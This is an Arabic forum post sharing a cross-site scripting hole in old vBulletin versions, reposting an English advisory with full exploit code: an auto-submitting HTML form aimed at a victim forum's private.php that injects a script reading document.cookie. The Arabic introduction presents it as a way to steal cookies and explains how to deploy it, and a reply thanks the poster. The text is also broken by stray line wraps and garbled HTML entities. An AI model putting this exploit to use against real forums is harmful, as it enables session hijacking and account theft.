هوهو هي هي ثغرة جديدة لمنتديات الvb

ثغره جديده في منتديات الvb
________________________
أرجوا عدم استخدام الثغرة على المسلمين وفيما يظر بالإسلام وفيما حرمه الله
لكن هذي كانت على النسخة التجريبية Beta
بالنسبة للثغرة فهي واضحة
وهي تستغل عن طريق الرسائل private.php وتقوم بسرقة الكوكيز ولكن بشرط يكون مفعل كود الهتمل في المنتدى وصاحب الثغرة يذكر انه قد يكون من الضروري تسجيل الدخول لك
طبعا استغلالها عن طريق تحويل الكود لملف html مع تغيير اسم الموقع ومجلد المنتدى
http://[victim]/forum/private.php
PHP:
--------------------------------------------------------------------------------
From: Ferruh Mavituna
Subject: VBulletin Preview Message&nbs
p;- XSS Vuln
---------------------------------------
---------------
VBulletin Private Message&nbs
p;"Preview
Message" XSS Vulnerability
---------------------------------------
---------------
Any kind of XSS att
acks possibility.
-----------------------------------------------------
-
About VBulletin;
-----------------------------------------------------
-
PHP Based Popular Forum&
nbsp;Application
Vendor & Demo;
<a href="http://www.vbulletin.com/" target="_blank"><a href="http://www.vbulletin.com/" target="_blank">http://www.vbulletin.com/</a></a>
---------------------------------------
---------------
Vulnerable;
-----------------------------------------------------
-
vBulletin 3.0.0 Beta 2
<
br />vBulletin 2.x
---------------------------------------
---------------
-----------------------------------------------------
-
Vendor Status;
-----------------------------------------------------
-
I can not contact v
endor for this issue ! No patch available at&nb
sp;the moment;
-----------------------------------------------------
-
Solution;
-----------------------------------------------------
-
HTML Encoding like post&
nbsp;thread preview page;
-----------------------------------------------------
-
Exploit Code;
-----------------------------------------------------
-
<html>
<body>
<form action="http://[victim]/forum/private.php"&nbs
p;method="post"
name="vbform">
<input type="hidden" name="do" value="insertpm" />
<input type="hidden" name="pmid" value="" />
<input type="hidden" name="forward" value="" />
<input type="hidden" name="receipt" value="0" />
<input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" />
<textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"></textarea>
<input type="submit" class="button" name="sbutton" value="Post
Message"
accesskey="s" tabindex="4" />
<input type="submit" class="button" value="Preview
Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >
<input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" />
<input type="checkbox" name="signature" value="1" id="cb_signature" />
<input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" />
<input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies" />
</form>
<script>
//Set Values and Submit
// You
can write your own JS codes
var xss = "\"><script>alert(document.coo
kie)</script>";
document.vbform.title.value=xss;
document.vbform.preview.click();
</script>
</body>
</html>
*You may need login first
Ferruh Mavituna
Web Application Security
Consultant
Freelance Developer & Designer
<a href="http://ferruh.mavituna.com"
target="_blank"><a href="http://ferruh.mavituna.com" target="_blank">http://ferruh.mavituna.com</a></a>

ألف الشكر لك على هذا الموضوع
الجميل والمفيد والرائع
وشكراً على جهودك المبذولة .



تحياتي لك.......